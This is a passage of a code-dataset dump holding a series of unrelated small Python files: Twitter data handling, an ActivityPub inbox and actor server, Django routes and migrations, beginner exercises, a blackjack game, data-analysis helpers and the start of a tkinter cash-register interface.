\"/home/dicle/Documents/data/tr_twitter_raw25Apr/\"\n outroot = \"/home/dicle/Documents/data/tr_twitter_raw25Apr/tr_tweets\"\n folders = [\"201302\", \"201303\"]\n\n for foldername in folders:\n infolderpath = os.path.join(inroot, foldername)\n outfolderpath = io_utils.ensure_dir(os.path.join(outroot, \"tr_\"+foldername))\n n, tr, nr = count_tweets(infolderpath, outfolderpath)\n print(n, tr, nr)\n\n '''\n select_tweets()\n '''\n tweets2csv(inpath=\"/home/dicle/Documents/data/tr_twitter_raw25Apr/selected_tr_tweets\", \n outpath=\"/home/dicle/Documents/data/tr_twitter_raw25Apr/2100trtweets.csv\")\n '''\n \n \n","sub_path":"library/modules/dataset/twitter/twitter_raw_data.py","file_name":"twitter_raw_data.py","file_ext":"py","file_size_in_byte":6447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"22137007","text":"\"\"\"Handles requests for ActivityPub endpoints: actors, inbox, etc.\n\"\"\"\nimport datetime\nimport json\nimport logging\nimport string\n\nimport appengine_config\n\nfrom granary import as2, microformats2\nimport mf2py\nimport mf2util\nfrom oauth_dropins.webutil import util\nimport webapp2\n\nimport common\nfrom models import Follower, MagicKey, Response\nfrom httpsig.requests_auth import HTTPSignatureAuth\n\nSUPPORTED_TYPES = (\n 'Accept',\n 'Announce',\n 'Article',\n 'Audio',\n 'Create',\n 'Follow',\n 'Image',\n 'Like',\n 'Note',\n 'Video',\n)\n\n\ndef send(activity, inbox_url, user_domain):\n \"\"\"Sends an ActivityPub request to an inbox.\n\n Args:\n activity: dict, AS2 activity\n inbox_url: string\n user_domain: string, domain of the bridgy fed user sending the request\n\n Returns:\n requests.Response\n \"\"\"\n logging.info('Sending AP request from %s: %s', user_domain,\n json.dumps(activity, indent=2))\n\n # prepare HTTP Signature (required by Mastodon)\n # https://w3c.github.io/activitypub/#authorization-lds\n # https://tools.ietf.org/html/draft-cavage-http-signatures-07\n # https://github.com/tootsuite/mastodon/issues/4906#issuecomment-328844846\n acct = 'acct:%s@%s' % (user_domain, user_domain)\n key = MagicKey.get_or_create(user_domain)\n auth = HTTPSignatureAuth(secret=key.private_pem(), key_id=acct,\n algorithm='rsa-sha256')\n\n # deliver to inbox\n headers = {\n 'Content-Type': common.CONTENT_TYPE_AS2,\n # required for HTTP Signature\n # https://tools.ietf.org/html/draft-cavage-http-signatures-07#section-2.1.3\n 'Date': datetime.datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT'),\n }\n return common.requests_post(inbox_url, json=activity, auth=auth, headers=headers)\n\n\nclass ActorHandler(webapp2.RequestHandler):\n \"\"\"Serves /[DOMAIN], fetches its mf2, converts to AS Actor, and serves it.\"\"\"\n\n def get(self, domain):\n url = 'http://%s/' % domain\n resp = common.requests_get(url)\n mf2 = mf2py.parse(resp.text, url=resp.url, img_with_alt=True)\n # logging.info('Parsed mf2 for %s: %s', resp.url, json.dumps(mf2, indent=2))\n\n hcard = mf2util.representative_hcard(mf2, resp.url)\n logging.info('Representative h-card: %s', json.dumps(hcard, indent=2))\n if not hcard:\n common.error(self, \"\"\"\\\nCouldn't find a \\\nrepresentative h-card on %s\"\"\" % resp.url)\n\n key = MagicKey.get_or_create(domain)\n obj = common.postprocess_as2(as2.from_as1(microformats2.json_to_object(hcard)),\n key=key)\n obj.update({\n 'inbox': '%s/%s/inbox' % (appengine_config.HOST_URL, domain),\n 'outbox': '%s/%s/outbox' % (appengine_config.HOST_URL, domain),\n })\n logging.info('Returning: %s', json.dumps(obj, indent=2))\n\n 
self.response.headers.update({\n 'Content-Type': common.CONTENT_TYPE_AS2,\n 'Access-Control-Allow-Origin': '*',\n })\n self.response.write(json.dumps(obj, indent=2))\n\n\nclass InboxHandler(webapp2.RequestHandler):\n \"\"\"Accepts POSTs to /[DOMAIN]/inbox and converts to outbound webmentions.\"\"\"\n\n def post(self, domain):\n logging.info('Got: %s', self.request.body)\n\n # parse and validate AS2 activity\n try:\n activity = json.loads(self.request.body)\n assert activity\n except (TypeError, ValueError, AssertionError):\n common.error(self, \"Couldn't parse body as JSON\", exc_info=True)\n\n obj = activity.get('object') or {}\n if isinstance(obj, basestring):\n obj = {'id': obj}\n\n type = activity.get('type')\n if type == 'Accept': # eg in response to a Follow\n return # noop\n if type == 'Create':\n type = obj.get('type')\n elif type not in SUPPORTED_TYPES:\n common.error(self, 'Sorry, %s activities are not supported yet.' % type,\n status=501)\n\n # TODO: verify signature if there is one\n\n # fetch actor if necessary so we have name, profile photo, etc\n for elem in obj, activity:\n actor = elem.get('actor')\n if actor and isinstance(actor, basestring):\n elem['actor'] = common.get_as2(actor).json()\n\n activity_unwrapped = common.redirect_unwrap(activity)\n if type == 'Follow':\n self.accept_follow(activity, activity_unwrapped)\n return\n\n # send webmentions to each target\n as1 = as2.to_as1(activity_unwrapped)\n common.send_webmentions(self, as1, proxy=True, protocol='activitypub',\n source_as2=json.dumps(activity_unwrapped))\n\n def accept_follow(self, follow, follow_unwrapped):\n \"\"\"Replies to an AP Follow request with an Accept request.\n\n Args:\n follow: dict, AP Follow activity\n follow_unwrapped: dict, same, except with redirect URLs unwrapped\n \"\"\"\n logging.info('Replying to Follow with Accept')\n\n followee = follow.get('object')\n followee_unwrapped = follow_unwrapped.get('object')\n follower = follow.get('actor')\n if not followee or not followee_unwrapped or not follower:\n common.error(self, 'Follow activity requires object and actor. Got: %s' % follow)\n\n inbox = follower.get('inbox')\n follower_id = follower.get('id')\n if not inbox or not follower_id:\n common.error(self, 'Follow actor requires id and inbox. Got: %s', follower)\n\n # store Follower\n user_domain = util.domain_from_link(followee_unwrapped)\n Follower.get_or_create(user_domain, follower_id, last_follow=json.dumps(follow))\n\n # send AP Accept\n accept = {\n '@context': 'https://www.w3.org/ns/activitystreams',\n 'id': util.tag_uri(appengine_config.HOST, 'accept/%s/%s' % (\n (user_domain, follow.get('id')))),\n 'type': 'Accept',\n 'actor': followee,\n 'object': {\n 'type': 'Follow',\n 'actor': follower_id,\n 'object': followee,\n }\n }\n resp = send(accept, inbox, user_domain)\n self.response.status_int = resp.status_code\n self.response.write(resp.text)\n\n # send webmention\n common.send_webmentions(\n self, as2.to_as1(follow), proxy=True, protocol='activitypub',\n source_as2=json.dumps(follow_unwrapped))\n\n\napp = webapp2.WSGIApplication([\n (r'/%s/?' 
% common.DOMAIN_RE, ActorHandler),\n (r'/%s/inbox' % common.DOMAIN_RE, InboxHandler),\n], debug=appengine_config.DEBUG)\n","sub_path":"activitypub.py","file_name":"activitypub.py","file_ext":"py","file_size_in_byte":6791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"558322913","text":"from PyInquirer import Separator\n\n\"\"\" Welcome view question set \"\"\"\nquestions = [\n {\n # Framework Jumpstarter\n 'type': 'list',\n 'name': 'framework',\n 'message': '* Choose the framework to jumpstart |',\n 'choices': [\n {\n 'name': '.net'\n },\n {\n 'name': 'python'\n },\n {\n 'name': 'javascript'\n },\n {\n 'name': 'php'\n },\n ],\n },\n {\n # Project name\n 'type': 'input',\n 'name': 'project_name',\n 'message': f'* Name of project (myproject) |',\n 'default': 'myproject',\n },\n {\n # Project location\n 'type': 'input',\n 'name': 'location',\n 'message': '* Location of created project |'\n },\n {\n # Project in sub-folder [Y/N]\n 'type': 'confirm',\n 'name': 'is_sub_folder',\n 'message': 'Do you want your project in a sub-folder?',\n 'default': False\n },\n {\n # Additional project feature\n 'type': 'checkbox',\n 'name': 'additional_stuff',\n 'message': 'Select more stuff you want for your project',\n 'choices': [\n Separator('= General Stuff ='),\n {\n 'name': 'Item 1'\n },\n {\n 'name': 'Item 2'\n },\n {\n 'name': 'Item 3'\n },\n ]\n },\n]\n\n\n\"\"\" List of all application frameworks for jumpstarting \"\"\"\n\"\"\" Add optional frameworks here! \"\"\"\nframework_presets = [\n '.net',\n 'django',\n 'flask',\n 'c# (console)',\n 'c++ (console)',\n 'symfony',\n 'laravel',\n 'reactjs',\n 'vuejs',\n 'angularjs',\n 'backbonejs',\n 'aureliajs',\n 'python',\n]\n","sub_path":"framework_jumpstarter/utils/global_vars.py","file_name":"global_vars.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"443450662","text":"# Declaration of array.\n\narr = []\n\n# Taking the total size of the array as input from the user.\n\nn = int(input(\"Enter size of the array : \"))\n\n# The loop below reads the numbers from the user via stdin.\n\nfor i in range(0,n):\n print(\"Enter element %d : \" % (i+1))\n arr.append(int(input()))\n\nk = int(input(\"Enter the value you want to find : \"))\n\n# found is a boolean variable which tells whether the value we want to find \n# is present in the array or not.\n\nfound = False\n\nfor i in range(len(arr)):\n # If k is present in arr\n if(arr[i] == k):\n found = True\n print(\"%d found at %dth position : \" %(k,i+1))\n break\n# If k is not present in arr\nif(found == False):\n print(\"%d is not in the list.\" %k)","sub_path":"search-algos/linear_search/l_search.py","file_name":"l_search.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"428799790","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Created on 2/22/17 6:25 PM\n# Project: topic_select\n# Author: PYZ\n\n\"\"\"\nThis module is used to select high-quality topics\n\"\"\"\nfrom math import log\nfrom sys import argv\n\nimport pandas as pd\n\nfrom utils.file_util import save_line_file\n\ntopic_word_path = '/mnt/data/topics_{}.csv'\n\n\ndef entropy(path, k):\n \"\"\"Compute the entropy of a single topic\"\"\"\n src_csv = pd.read_csv(path)\n tar_csv_path = '/mnt/data/topic_entropy_{}.csv'.format(k)\n ret = ['topicid,topic_entropy']\n for topic_id in src_csv.topicid.unique():\n topic_entropy = sum(map(lambda x: x * log(x), 
list(src_csv[src_csv.topicid == topic_id].topic_word_score))) * -1\n ret.append('%d,%f' % (topic_id, topic_entropy))\n save_line_file(ret, tar_csv_path, 'w')\n\n\ndef main():\n k = argv[1]\n entropy(topic_word_path.format(k), k)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"calculate/topic_select.py","file_name":"topic_select.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"364716092","text":"from ums.views import admin_dashboard, close_ticket\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n\n\n path('usr/home', views.user_homepage, name=\"user_homepage\"),\n path('usr/patients', views.all_patients, name='all_patients'),\n path('usr/stats', views.stats, name='stats'),\n path('usr/patients/', views.single_patient, name='single_patient'),\n path('usr/patients/del/', views.delete_patient_record, name='delete_record'),\n\n path('usr/charts/city/pie',views.get_chart_pie_data),\n path('usr/charts/date/line',views.get_chart_line_data),\n\n\n\n]\n","sub_path":"ims/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"44832777","text":"from random import shuffle\nclass Card:\n def __init__(self,rank,suit):\n self.rank=rank\n self.suit=suit\n \n def card_value(self):\n if self.rank in \"TJQK\":\n return 10\n elif self.rank in \"A\": # ace value reworked to 11\n return 11\n else:\n return \" 23456789\".index(self.rank)\n \n def get_rank(self):\n return self.rank\n def __str__(self):\n return \"%s%s\"%(self.rank,self.suit)\n \nclass Hand:\n def __init__(self,name):\n self.name=name\n self.cards=[]\n \n def add_card(self,card):\n self.cards.append(card)\n \n def get_value(self):\n result=0\n aces=0\n for card in self.cards:\n result +=card.card_value()\n if card.get_rank()==\"A\": # count aces so a busting hand can downgrade an ace from 11 to 1\n aces += 1\n while result > 21 and aces > 0:\n result -= 10\n aces -= 1\n return result\n \n def __str__(self):\n text = \"%s's contains:\\n \" %self.name\n for card in self.cards:\n text +=str(card)+\" \"\n text +=\"\\nHand value: \"+str(self.get_value())\n return text\n \nclass Deck:\n def __init__(self):\n ranks = \"23456789TJQKA\"\n suits = \"DCHS\"\n self.cards = [Card(r,s) for r in ranks for s in suits]\n shuffle(self.cards)\n \n def deal_card(self):\n return self.cards.pop()\n def new_game():\n d = Deck()\n player_hand = Hand(\"Player\")\n dealer_hand = Hand(\"Dealer\")\n player_hand.add_card(d.deal_card())\n player_hand.add_card(d.deal_card())\n dealer_hand.add_card(d.deal_card())\n print (dealer_hand)\n print(\"=\"*20)\n print(player_hand)\n in_game=True\n while player_hand.get_value()<21:\n ans=input(\"Hit or stand? 
(h/s)\")\n if ans ==\"h\":\n player_hand.add_card(d.deal_card())\n print(player_hand)\n if player_hand.get_value()>21:\n print(\"You lose\")\n in_game = False\n elif ans == \"s\":\n print(\"You stand\")\n break\n print(\"=\"*20)\n if in_game:\n while dealer_hand.get_value()<17:\n dealer_hand.add_card(d.deal_card())\n print(dealer_hand)\n if dealer_hand.get_value()>21:\n print(\"Dealer bust\")\n in_game=False\n if in_game:\n if player_hand.get_value()>dealer_hand.get_value():\n print(\"You win\")\n else:\n print(\"Dealer win\")\n if __name__==\"__main__\":\n new_game()\nif __name__==\"__main__\":\n Deck()","sub_path":"21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"316029016","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport scipy.stats as scs\nimport statsmodels.tsa.api as smt\nimport statsmodels.api as sm\nimport tsa.ts_modelling as tsm\n\n\ndef plotSample( x, log=False, lags=None, figSize=( 10, 8 ), figStyle= 'bmh', alpha= 0.5, **kwargs ):\n \"\"\"\n Convenience function to plot given sample and analyze serial correlation visually.\n\n :param x: array_like\n Array of sample values\n :param log: boolean\n Controls whether this function plots logarithmic returns of the given sample x, or original sample.\n :param lags: array_like, optional\n Array of lag values, used on horizontal axis.\n If not given, ``lags=np.arange(len(corr))`` is used.\n :param figSize: Size\n :param figStyle: Style\n :param alpha: scalar, optional\n If a number is given, the confidence intervals for the given level are\n returned. For instance if alpha=.05, 95 % confidence intervals are\n returned where the standard deviation is computed according to\n Bartlett's formula. 
If None, no confidence intervals are plotted.\n :param **kwargs: kwargs, optional\n Optional keyword arguments that are directly passed on to the\n Matplotlib ``plot`` and ``axhline`` functions.\n :return:\n Matplotlib figure instance\n \"\"\"\n if not isinstance( x, pd.Series ):\n x = pd.Series( x )\n\n figLayout = ( 4, 2 ) if log else ( 3, 2 )\n\n with plt.style.context( figStyle ):\n plt.figure( figsize=figSize )\n # Specify initial layout position\n figYCoord = 0\n axTS = plt.subplot2grid( figLayout, ( figYCoord, 0 ), colspan=2 )\n axTS.set_title( 'Time Series Analysis Plots' )\n x.plot( ax=axTS )\n\n if log:\n figYCoord += 1\n axTSL = plt.subplot2grid( figLayout, ( figYCoord, 0 ), colspan=2 )\n axTSL.set_title( 'Log Returns' )\n # Calculate logarithmic returns sample, using original sample\n # and replace original sample with calculated results\n x = tsm.applyLog( x )\n x.plot( ax=axTSL )\n\n figYCoord += 1\n axACF = plt.subplot2grid( figLayout, ( figYCoord, 0 ) )\n axPACF = plt.subplot2grid( figLayout, ( figYCoord, 1 ) )\n smt.graphics.plot_acf( x, lags=lags, ax=axACF, alpha=alpha )\n smt.graphics.plot_pacf( x, lags=lags, ax=axPACF, alpha=alpha )\n\n figYCoord += 1\n axQQ = plt.subplot2grid( figLayout, ( figYCoord, 0 ) )\n axQQ.set_title( 'QQ Plot' )\n axPP = plt.subplot2grid( figLayout, ( figYCoord, 1 ) )\n sm.qqplot( x, line='s', ax=axQQ )\n scs.probplot( x, sparams=( x.mean(), x.std() ), plot=axPP )\n\n plt.tight_layout()\n plt.show()\n return\n\n","sub_path":"tsa/ts_plot.py","file_name":"ts_plot.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"525903012","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('reviews', '0002_auto_20161118_1317'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='reviews',\n name='preview_text',\n field=models.CharField(max_length=10000, verbose_name='Текс превью отзыва', help_text='Введите текст', blank=True),\n ),\n ]\n","sub_path":"reviews/migrations/0003_reviews_preview_text.py","file_name":"0003_reviews_preview_text.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"650450567","text":"from exif import Image\nimport os\nimport matplotlib.pyplot as plt\n\nlens = []\ng5x = []\nslr = []\n\ndirectory = '/Users/mack/Pictures/2020' # Directory to search, will search recursively\n\nfor root, subdirs, files in os.walk(directory):\n files = [ fi for fi in files if fi.endswith(\".JPG\") ]\n for fi in files:\n f = open(root+'/'+fi, 'rb')\n pic = Image(f)\n \n crop_factor = (1.415/(pic.pixel_x_dimension / pic.focal_plane_x_resolution))\n lens.append(pic.focal_length*crop_factor)\n if crop_factor > 2: # G5x has ~2.7x crop factor\n g5x.append(pic.focal_length*crop_factor)\n else:\n slr.append(pic.focal_length*crop_factor)\n\nplt.hist(lens, 100)\nplt.show()\n","sub_path":"focal_lengths.py","file_name":"focal_lengths.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"239719043","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('omfgallery', '0003_auto_20151215_1712'),\n ]\n\n operations = [\n 
migrations.AddField(\n model_name='album',\n name='album_type',\n field=models.CharField(max_length=2, default='MP', choices=[('V', 'Videos'), ('MV', 'Making videos'), ('MP', 'Making Photos')]),\n ),\n ]\n","sub_path":"onemoreframe/omfgallery/migrations/0004_album_album_type.py","file_name":"0004_album_album_type.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"601229178","text":"# using validation_split\r\n\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Dense\r\nimport numpy as np\r\nfrom numpy import array\r\n\r\n#1. data\r\nx = np.array(range(1, 101))\r\n# x2 = array(range(1, 101))\r\n# same data.\r\ny = array(range(101,201))\r\n\r\n# these are indices.\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nx_train, x_test, y_train, y_test = train_test_split(\r\n x, y, train_size=0.8, test_size=0.2 #, shuffle=True\r\n ) \r\n# x_test, x_val, y_test, y_val = train_test_split(\r\n# x_test, y_test, train_size = 0.5)\r\n\r\n#if shuffle is set to False, the data comes out in order. \r\n# the default is True (random)\r\n#print(x_test.shape)\r\n#print(x_train.shape)\r\n\r\n# Kaggle 50~100, Dacon problems ~20, hackathons etc... let's practice on many problems.\r\n\r\n'''\r\nx_train = x[:60] # slice 60 data points, from index 0 to 59\r\nx_val = x[60:80] # 20 in total, from 60 to 79\r\nx_test = x[80:] # 20 in total, from 80 to 100\r\n\r\ny_train = y[:60] # slice 60 data points, from index 0 to 59\r\ny_val = y[60:80] # 20 in total, from 60 to 79\r\ny_test = y[80:] # 20 in total, from 80 to 100\r\n'''\r\n#2\r\nmodel = Sequential()\r\nmodel.add(Dense(20, input_dim = 1, activation = 'relu'))\r\nmodel.add(Dense(30))\r\nmodel.add(Dense(40))\r\nmodel.add(Dense(20))\r\nmodel.add(Dense(1))\r\n\r\n#3.\r\nmodel.compile(loss = 'mse', optimizer = 'adam')\r\nmodel.fit(x_train, y_train, epochs = 300, batch_size = 1, \r\n validation_split = 0.2)\r\n\r\n#4.\r\nloss = model.evaluate(x_test, y_test, batch_size = 1)\r\nprint('loss = ', loss)\r\n\r\nresult = model.predict([101, 102, 103])\r\nprint('result = ', result)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"tensorflow/keras/keras05.split3.py","file_name":"keras05.split3.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"363606945","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 25 14:24:33 2018\n\n@author: krishna\n\"\"\"\nimport copy\n#f = open(\"data_gyroscope.csv\",\"r\")\n#f = open(\"data_accelerometer.csv\",\"r\")\nf = open(\"outputTemp1.csv\",\"r\")\nMf = 0\nSf = 0\ndataMatrix = []\n\nfor line in f:\n temp = line.split(',')\n dataMatrix.append(temp)\n \nzScoreMatrix = copy.deepcopy(dataMatrix)\nfor indC in range(len(dataMatrix[0])-1):\n SUM = 0\n for indR in range(1,len(dataMatrix)):\n SUM += float(dataMatrix[indR][indC])\n Mf = float(SUM/(len(dataMatrix)-1))\n SUM = 0\n for indR in range(1,len(dataMatrix)):\n SUM+=abs(float(dataMatrix[indR][indC])-Mf)\n Sf = float(SUM/(len(dataMatrix)-1))\n for indR in range(1,len(dataMatrix)):\n zScoreMatrix[indR][indC] = str(float((float(dataMatrix[indR][indC])-float(Mf))/float(Sf)))\n \n#f1 = open(\"zData_accelerometer.csv\",\"w\")\n#f1 = open(\"zData_gyroscope.csv\",\"w\")\nf1 = open(\"zData.csv\",\"w\")\nfor x in zScoreMatrix:\n temp1 = \",\".join(x)\n f1.write(temp1)\nf.close()\nf1.close()\n \n ","sub_path":"Codes/zScore.py","file_name":"zScore.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"88910710","text":"\ndef equilibriumPoint(arr, n):\n for i in range(n):\n leftsum = 0\n rightsum = 0\n for j in range(i):\n leftsum += arr[j]\n for j in range(i + 1, n):\n rightsum += arr[j]\n if leftsum == rightsum:\n return i + 1\n return -1\n\n\ndef validate_equilibrium_inputs(array, n):\n if n < 0 or n > len(array):\n raise Exception('Please add a validate N value')\n for a in array:\n if isinstance(a, int):\n if a < 0:\n raise Exception('value cannot be negative')\n else:\n raise Exception('value can only be integers')\n\n\ndef inputs():\n print('\\033[93m' + \"Please add space while entering numbers of array i.e 1 2 3 4 5\" + '\\033[0m')\n print('\\033[93m' + \"Only add positive number\" + '\\033[0m')\n array = list(map(int, input(\"\\nEnter the array : \").strip().split()))\n _n = int(input(\"Enter numbers of N : \"))\n validate_equilibrium_inputs(array, _n)\n return equilibriumPoint(array, _n)\n\n\nprint(inputs())","sub_path":"question_2.py","file_name":"question_2.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"292407561","text":"import tkinter\nfrom tkinter import ttk\n#from backend import *\nfrom database import *\nfrom kortTerminal import *\n\nitems = [\"Ienhet\", \"Dndpfsd\", \"Nflpwnf\"]\ndb = Database()\nkortbetaling = KortBetaling()\n\n\nrodListe = [\"Funksjoner\", \"Tilbake\", \"Tilbake\", \"Tilbake\"]\ngronnListe = [\"Endre antall\", \"Artikkel\", \"Kort\", \"Linjeretur\"]\ngulListe = [\"Søk artikkel\", \"Flere funksjoner\", \"Kontanter\", \"\"]\nblaListe = [\"Prisforespørsel\", \"Linjerabatt\", \"Rabatter\", \"\"]\norangeListe = [\"Fjern artikkel\", \"E-tjenester\", \"Andre betalingsmåter\", \"\"]\nlillaListe = [\"Lojalitet\", \"Kvitteringsfunksjoner\", \"\", \"\"]\nhvitListe = [\"Betaling\", \"Velikehold\", \"\", \"\"]\n\n\n\nclass GuiKasse:\n def __init__(self, userId=0):\n print(userId, \"s6k\")\n self.hovedvindu = tkinter.Tk()\n self.hovedvindu.title(\"Kassesystem\")\n #self.hovedvindu.attributes('-fullscreen', True) # FULLSCREEN\n self.hovedvindu.geometry(\"\")\n\n self.HEIGHT = self.hovedvindu.winfo_screenwidth()\n\n\n \n\n # Frames\n\n #Widgets\n self.showItemsFrame = tkinter.Frame(self.hovedvindu, background=\"#111\")\n self.showItemsFrame.grid(column=0, row=0, columnspan=1)\n\n self.angiFrame = tkinter.Frame(self.hovedvindu)\n self.angiFrame.grid(column=0, row=1, sticky=\"W\")\n\n self.funcFrame = tkinter.Frame(self.hovedvindu, background=\"#31B4D8\")\n self.funcFrame.grid(column=2, row=0, rowspan=3) # , sticky=\"e\")\n\n self.keysFrame = tkinter.Frame(self.hovedvindu)\n self.keysFrame.grid(column=0, row=2)\n\n self.footerFrame = tkinter.Frame(self.hovedvindu, background=\"red\")\n self.footerFrame.grid(column=0, row=3, sticky=\"WE\", columnspan=3)\n\n\n #Widget TREEVIEW\n self.display_treeview = ttk.Treeview(self.showItemsFrame, selectmode=tkinter.BROWSE, show=\"tree\", column=('artikelNr', 'article', 'price'), height=10)\n\n #Variabler\n self.state = 0\n self.artiklerIKurv = []\n self.antallLinjer = 0\n self.treeviewID = 0\n self.treeListLen = 0\n self.currentScollPOS = -1\n\n #Stringvar\n self.sumStringvar = tkinter.StringVar()\n self.sumStringvar.set(\"\")\n\n self.antallArtikler_stringvar = tkinter.StringVar()\n self.antallArtikler_stringvar.set(\"\")\n\n #EVENTS\n self.hovedvindu.bind('', self.enterKEY_Funk)\n self.display_treeview.bind('', self.selectFromTree_func)\n\n #Bulding the GUI: \n self.treeview()\n self.angifelt()\n self.funcfelt()\n 
self.numfelt()\n self.footer()\n\n #MAINLOOP\n tkinter.mainloop()\n\n #Building functions\n\n def treeview(self):\n style = ttk.Style()\n style.configure(\"Treeview\", font=(\"Arial\", 14), rowheight=25)\n #self.display_treeview = ttk.Treeview(self.showItemsFrame, show=\"tree\", column=('artikelNr', 'article', 'price'))\n self.display_treeview.heading('#1', text=\"artikelNr\", anchor=tkinter.CENTER)\n self.display_treeview.heading('#2', text=\"article\", anchor=tkinter.CENTER)\n self.display_treeview.heading('#3', text=\"price\", anchor=tkinter.CENTER)\n\n self.display_treeview.column('#0', minwidth=0, width=0)\n self.display_treeview.column('#1', minwidth=0, width=150, anchor=tkinter.W)\n self.display_treeview.column('#2', minwidth=0, width=250, anchor=tkinter.W)\n self.display_treeview.column('#3', minwidth=0, width=160, anchor=tkinter.W)\n\n self.display_treeview.grid(column=0, row=0, columnspan=2)\n\n #self.display_treeview.insert(\"\", \"end\", value=('70-8001', 'Bærepose S', '1.00'))\n #self.display_treeview.insert(\"\", \"end\", value=('70-8001', 'Bærepose S', '1.00'))\n\n #self.scrollUP_button = tkinter.Button(self.showItemsFrame, text=\"^\", command=self.selectFromTree_func).grid(column=1, row=0)\n #self.scrollDOWN_button = tkinter.Button(self.showItemsFrame, text=\"v\", command=self.selectFromTree_func).grid(column=1, row=1)\n\n self.antallArtikler = tkinter.Label(self.showItemsFrame, textvariable=self.antallArtikler_stringvar, fg=\"#fff\", bg=\"#111\", font=(\"Arial\", 14))\n self.antallArtikler.grid(column=0, row=1, sticky=\"NW\")\n\n self.sumLabel = tkinter.Label(self.showItemsFrame, textvariable=self.sumStringvar, fg=\"#fff\", bg=\"#111\", font=(\"Arial\", 14))\n self.sumLabel.grid(column=1, row=1, sticky=\"NWE\")\n \n #self.scroll_canvas = tkinter.Canvas(self.scrollFrame, background=\"#111\", width=10)\n #self.scroll_canvas.grid(column=0, row=0)\n \n #self.scroll_canvas.create_oval(2, 2, 2, 2)\n\n #self.scrollUP_button = tkinter.Button(self.scrollFrame, text=\"^\", command=self.selectFromTree_func).grid(column=0, row=0, pady=5, padx=(0, 10))\n #self.scrollDOWN_button = tkinter.Button(self.scrollFrame, text=\"v\", command=self.selectFromTree_func).grid(column=0, row=1, pady=2)\n\n def angifelt(self):\n #Widgets:\n self.label = tkinter.Label(self.angiFrame, text=\"Angi/skann artikkel:\", font=(\"Arial\", 14))\n self.entry = tkinter.Entry(self.angiFrame, width=50, font=(\"Arial\", 14))\n \n #Placement\n self.label.grid(column=0, row=0, sticky=\"NW\", pady=0, padx=20)\n self.entry.grid(column=0, row=1, sticky=\"NW\", pady=0, padx=20)\n\n\n def funcfelt(self):\n x_margin = 10\n y_margin = 5\n x_padding = 100\n y_padding = 25-5\n borderWidth = 5\n\n\n self.rodStringvar = tkinter.StringVar()\n self.rodStringvar.set(\"F1\\n\" + rodListe[self.state])\n\n self.gronnStringvar = tkinter.StringVar()\n self.gronnStringvar.set(\"F2\\n\" + gronnListe[self.state])\n\n self.gulStringvar = tkinter.StringVar()\n self.gulStringvar.set(\"F3\\n\" + gulListe[self.state])\n\n self.blaStringvar = tkinter.StringVar()\n self.blaStringvar.set(\"F4\\n\" + blaListe[self.state])\n\n self.orangeStringvar = tkinter.StringVar()\n self.orangeStringvar.set(\"F5\\n\" + orangeListe[self.state])\n\n self.lillaStringvar = tkinter.StringVar()\n self.lillaStringvar.set(\"F6\\n\" + lillaListe[self.state])\n\n self.hvitStringvar = tkinter.StringVar()\n self.hvitStringvar.set(\"F7\\n\" + hvitListe[self.state])\n\n #Widgets\n self.funksjonButton = tkinter.Button(self.funcFrame, textvariable=self.rodStringvar, width=2, 
